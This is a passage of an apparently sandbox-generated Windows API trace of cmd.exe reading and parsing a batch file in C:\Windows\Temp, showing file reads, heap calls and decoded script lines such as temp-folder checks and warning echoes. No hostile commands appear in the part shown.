| out: lpMode=0x7ff7bd729608) returned 1 [0177.514] SetConsoleInputExeNameW () returned 0x1 [0177.514] GetConsoleOutputCP () returned 0x1b5 [0177.515] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.515] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.515] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.515] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.515] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.515] SetFilePointer (in: hFile=0x84, lDistanceToMove=4773, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0177.516] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.516] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0177.516] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.516] SetFilePointer (in: hFile=0x84, lDistanceToMove=4775, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0177.516] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ntlocal EnableDelayedExpansion\r\n\\Local\\Temp\"\r\n\r\ne\r\n======================================================================================\r\n") returned 2 [0177.516] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.516] GetFileType (hFile=0x84) returned 0x1 [0177.516] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.516] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0177.516] GetProcessHeap () returned 0x19a8f1e0000 [0177.516] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.517] GetProcessHeap () returned 0x19a8f1e0000 [0177.517] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.518] _tell (_FileHandle=3) returned 4775 [0177.518] _close (_FileHandle=3) returned 0 [0177.518] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.518] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.518] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.518] SetFilePointer (in: hFile=0x84, lDistanceToMove=4775, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0177.519] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.519] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0177.519] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.519] SetFilePointer (in: hFile=0x84, lDistanceToMove=4915, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0177.519] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0177.519] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.519] GetFileType (hFile=0x84) returned 0x1 [0177.519] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.519] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0177.519] GetProcessHeap () returned 0x19a8f1e0000 [0177.519] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.520] GetProcessHeap () returned 0x19a8f1e0000 [0177.521] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.521] _tell (_FileHandle=3) returned 4915 [0177.521] _close (_FileHandle=3) returned 0 [0177.522] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.522] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.522] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.522] SetFilePointer (in: hFile=0x84, lDistanceToMove=4915, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0177.522] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.522] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0177.522] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.522] SetFilePointer (in: hFile=0x84, lDistanceToMove=4917, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0177.522] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0177.522] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.522] GetFileType (hFile=0x84) returned 0x1 [0177.523] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.523] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0177.523] GetProcessHeap () returned 0x19a8f1e0000 [0177.523] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.523] GetProcessHeap () returned 0x19a8f1e0000 [0177.525] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.525] _tell (_FileHandle=3) returned 4917 [0177.525] _close (_FileHandle=3) returned 0 [0177.525] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.526] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.526] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.526] SetFilePointer (in: hFile=0x84, lDistanceToMove=4917, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0177.526] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.526] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0177.526] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.526] SetFilePointer (in: hFile=0x84, lDistanceToMove=4966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0177.526] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"!_batf!\" | find /i \"!_ttemp!\" %nul1% && (\r\n", cbMultiByte=49, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo \"!_batf!\" | find /i \"!_ttemp!\" %nul1% && (\r\n=========================================================================================\r\n") returned 49 [0177.526] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.526] GetFileType (hFile=0x84) returned 0x1 [0177.526] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.526] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0177.526] GetProcessHeap () returned 0x19a8f1e0000 [0177.527] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.527] GetProcessHeap () returned 0x19a8f1e0000 [0177.527] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20a880 [0177.528] GetProcessHeap () returned 0x19a8f1e0000 [0177.528] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0177.528] GetEnvironmentVariableW (in: lpName="nul1", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0177.528] GetProcessHeap () returned 0x19a8f1e0000 [0177.528] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0177.528] GetProcessHeap () returned 0x19a8f1e0000 [0177.529] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20a880) returned 1 [0177.529] GetProcessHeap () returned 0x19a8f1e0000 [0177.530] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.530] _wcsicmp (_String1="echo", _String2=")") returned 60 [0177.530] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.530] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.530] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.530] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.530] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.531] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb800 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0177.531] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0177.531] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0177.531] _wcsicmp (_String1="IF", _String2="find") returned 3 [0177.531] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0177.531] _wcsicmp (_String1="REM", _String2="find") returned 12 [0177.531] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0ab0 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.531] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a30 [0177.531] GetProcessHeap () returned 0x19a8f1e0000 [0177.532] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca60 [0177.532] GetProcessHeap () returned 0x19a8f1e0000 [0177.532] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0930 [0177.532] GetProcessHeap () returned 0x19a8f1e0000 [0177.532] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0177.532] GetProcessHeap () returned 0x19a8f1e0000 [0177.532] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0177.532] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.532] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0177.532] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efece0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efece0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.532] SetFilePointer (in: hFile=0x84, lDistanceToMove=5001, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0177.532] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i not \"!_work!\"==\"!_ttemp!\" (\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if /i not \"!_work!\"==\"!_ttemp!\" (\r\n %nul1% && (\r\n=========================================================================================\r\n") returned 35 [0177.532] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.532] GetFileType (hFile=0x84) returned 0x1 [0177.532] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.532] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0177.533] GetProcessHeap () returned 0x19a8f1e0000 [0177.533] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.533] GetProcessHeap () returned 0x19a8f1e0000 [0177.534] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.534] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0177.534] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0177.534] _wcsicmp (_String1="IF", _String2="if") returned 0 [0177.535] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1eccc0 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb710, Size=0x1a) returned 0x19a8f1eb950 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb950) returned 0x1a [0177.535] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecda0 [0177.535] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0177.535] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0177.535] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0177.535] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0177.535] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.535] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0177.535] GetProcessHeap () returned 0x19a8f1e0000 [0177.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb770 [0177.536] _wcsicmp (_String1="ERRORLEVEL", _String2="\"!_work!\"") returned 67 [0177.536] _wcsicmp (_String1="EXIST", _String2="\"!_work!\"") returned 67 [0177.536] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"!_work!\"") returned 65 [0177.536] _wcsicmp (_String1="DEFINED", _String2="\"!_work!\"") returned 66 [0177.536] _wcsicmp (_String1="NOT", _String2="\"!_work!\"") returned 76 [0177.536] GetProcessHeap () returned 0x19a8f1e0000 [0177.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb860 [0177.536] GetProcessHeap () returned 0x19a8f1e0000 [0177.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb980 [0177.536] GetProcessHeap () returned 0x19a8f1e0000 [0177.536] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0177.537] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.537] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0177.537] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea40, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea40*=0x1fff, lpOverlapped=0x0) returned 1 [0177.537] SetFilePointer (in: hFile=0x84, lDistanceToMove=5012, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0177.537] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%nceline%\r\n!_work!\"==\"!_ttemp!\" (\r\n %nul1% && (\r\n=========================================================================================\r\n") returned 11 [0177.537] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.537] GetFileType (hFile=0x84) returned 0x1 [0177.537] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.537] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0177.537] GetProcessHeap () returned 0x19a8f1e0000 [0177.537] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.538] GetProcessHeap () returned 0x19a8f1e0000 [0177.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20a880 [0177.538] GetProcessHeap () returned 0x19a8f1e0000 [0177.538] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb710 [0177.538] GetEnvironmentVariableW (in: lpName="nceline", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x22 [0177.539] GetProcessHeap () returned 0x19a8f1e0000 [0177.539] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0177.539] GetProcessHeap () returned 0x19a8f1e0000 [0177.540] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20a880) returned 1 [0177.540] GetProcessHeap () returned 0x19a8f1e0000 [0177.541] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.542] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.542] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.542] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.542] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.542] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.542] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecb00 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0177.542] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.542] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.542] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.542] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.542] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.542] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1eddd0 [0177.542] GetProcessHeap () returned 0x19a8f1e0000 [0177.542] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0177.543] GetProcessHeap () returned 0x19a8f1e0000 [0177.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0ff0 [0177.543] GetProcessHeap () returned 0x19a8f1e0000 [0177.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0177.543] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.543] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.543] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.543] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.543] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.543] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.543] GetProcessHeap () returned 0x19a8f1e0000 [0177.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0177.543] GetProcessHeap () returned 0x19a8f1e0000 [0177.543] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0177.543] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.543] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0177.543] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe980, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe980*=0x1fff, lpOverlapped=0x0) returned 1 [0177.544] SetFilePointer (in: hFile=0x84, lDistanceToMove=5059, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0177.544] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Script is launched from the temp folder,\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Script is launched from the temp folder,\r\n\r\n=========================================================================================\r\n") returned 47 [0177.544] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.544] GetFileType (hFile=0x84) returned 0x1 [0177.544] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.544] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0177.544] GetProcessHeap () returned 0x19a8f1e0000 [0177.544] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0177.544] GetProcessHeap () returned 0x19a8f1e0000 [0177.545] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0177.545] GetProcessHeap () returned 0x19a8f1e0000 [0177.545] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0177.545] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.545] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.546] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.546] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.546] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.546] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.546] GetProcessHeap () returned 0x19a8f1e0000 [0177.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0177.546] GetProcessHeap () returned 0x19a8f1e0000 [0177.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0177.546] GetProcessHeap () returned 0x19a8f1e0000 [0177.546] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaed0 [0177.546] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.546] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0177.546] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe950, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe950*=0x1fff, lpOverlapped=0x0) returned 1 [0177.546] SetFilePointer (in: hFile=0x84, lDistanceToMove=5136, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0177.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Most likely you are running the script directly from the archive file.\r\n", cbMultiByte=77, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Most likely you are running the 